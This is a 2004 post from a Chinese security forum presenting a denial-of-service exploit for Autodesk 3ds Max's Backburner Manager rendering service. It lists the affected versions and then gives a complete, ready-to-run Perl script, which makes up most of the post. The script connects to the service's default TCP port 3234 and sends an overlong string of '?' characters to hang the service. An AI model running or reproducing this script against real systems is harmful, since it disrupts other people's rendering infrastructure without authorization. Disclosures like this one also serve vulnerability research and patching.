|
 | 作者: xtiger [xtiger]
 论坛用户 |
登录 |
| 3Dmax backburner Manager Dos Exploit 漏洞发现:tiger 测试代码:tiger 来 源:www.xtiger.net 发布日期:2004-7-20 受影响版本: 3dmax 5.0 backburner Manager Version 2.0 3dmax 6.0 backburner Manager Version 2.2 ------------------------------------------------------------------------------------------ 3Dmax backburner Manager是著名图形和动画设计软件3DMAX的网络组件,用于网络协作进行渲染等操作。存在DOS攻击缺陷,发送超长字符会导致服务挂起。 ############################################################ #!C:\perl\bin\perl.exe use IO::Socket; my $progname = $0; $progname =~ s,.'*/,,; $progname =~ s/\.\w*$//; $host = shift || 'localhost'; $port = shift || '3234'; #3Dmax backburner Manager默认监听在3234端口 $title = " =============================================\n‖ 3Dmax backburner Manager Dos Exploit 1.0! ‖\n =============================================\n BY tiger---www.xtiger.net&&www.thysea.com\n"; $Usage = " Usage: $progname [Host] [port](default is 3234)\n"; if ($host > 0){ dos(); } else { usage(); } sub dos { my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ) #建立socket连接 or die "$title [*] ERR-->can't connect to $host:$port! :(\n"; print ($title, "[*] connected to $host:$port\n"); print "[*] Sending string...\n"; print $socket ("?"x(2364),"\r\n") or die "$title [*] ERR-->Sending string failed! :(\n";#发送超长字符 print "[*] maybe crashed!\n"; $socket->close;#关闭socket连接 } sub usage { die $title,$Usage; } [此贴被 xtiger(xtiger) 在 08月24日23时07分 编辑过] |
| 地主 发表时间: 04-08-24 23:06 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 原创软件
标题: [原创]3DmaxbackburnerManagerDosExploit